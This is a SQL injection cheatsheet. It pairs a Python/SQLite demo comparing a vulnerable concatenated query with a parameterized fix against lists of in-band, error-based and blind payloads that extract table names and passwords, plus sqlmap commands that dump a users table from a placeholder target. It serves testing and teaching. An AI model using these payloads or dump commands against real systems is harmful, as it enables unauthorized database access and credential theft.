Critical | A03
💉 SQL Injection
🧠 Description
SQL injection occurs when user input is concatenated into SQL queries without proper sanitization or parameterization, allowing attackers to alter the query's logic and read or modify data they are not authorized to access.
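Added example (not part of the original cheatsheet): a minimal in-memory SQLite lookup written two ways, so the injection above can be reproduced and the fix verified side by side. The string-concatenated version lets the cheatsheet's tautology and UNION payloads change the query; the parameterized version treats the same input as a literal value. Table, rows and function names are constructed for the demo.

```python
import sqlite3


def make_db():
    # Constructed sample database (not real data).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("alice", "s3cret"), ("bob", "hunter2")],
    )
    conn.commit()
    return conn


def lookup_vulnerable(conn, username):
    # Input spliced straight into the statement text: the classic SQLi pattern.
    # A quote in the input ends the string literal and the rest becomes SQL.
    sql = "SELECT username FROM users WHERE username = '" + username + "'"
    return sorted(row[0] for row in conn.execute(sql))


def lookup_parameterized(conn, username):
    # Placeholder binding: the driver passes the value separately from the
    # statement, so quotes, OR clauses and '--' inside it are just characters.
    sql = "SELECT username FROM users WHERE username = ?"
    return sorted(row[0] for row in conn.execute(sql, (username,)))


def demo():
    conn = make_db()
    tautology = "' OR '1'='1"                     # from the in-band list above
    union = "' UNION SELECT password FROM users--"  # union-based payload above
    return {
        "vuln_tautology": lookup_vulnerable(conn, tautology),   # every user
        "vuln_union": lookup_vulnerable(conn, union),           # password column
        "safe_tautology": lookup_parameterized(conn, tautology),  # no match
        "safe_union": lookup_parameterized(conn, union),          # no match
        "safe_legit": lookup_parameterized(conn, "alice"),        # normal use
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name:15} -> {rows}")
```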
🎯 In-Band SQLi
# Basic detection
'
"
OR 1=1--
OR '1'='1

# Union-based
' UNION SELECT NULL--
' UNION SELECT table_name FROM information_schema.tables--
' UNION SELECT username, password FROM users--

# Error-based (MySQL)
' AND EXTRACTVALUE(1,CONCAT(0x7e,version()))--
' AND UPDATEXML(1,CONCAT(0x7e,user()),1)--
👻 Blind SQLi
# Boolean-based
' AND 1=1--
' AND 1=2--

# Time-based
' AND SLEEP(5)--
' AND (SELECT CASE WHEN 1=1 THEN SLEEP(5) END)--

# Substring extraction
' AND SUBSTRING((SELECT password FROM users LIMIT 1),1,1)='a'--
🛠️ Automated Tools
# SQLMap
sqlmap -u "http://target.com/?id=1" --batch --dbs
sqlmap -u "http://target.com/?id=1" -D database --tables
sqlmap -u "http://target.com/?id=1" -D database -T users --dump

# Manual exploitation
# Identify DB type from error messages
# Adjust payloads for MySQL, PostgreSQL, MSSQL, Oracle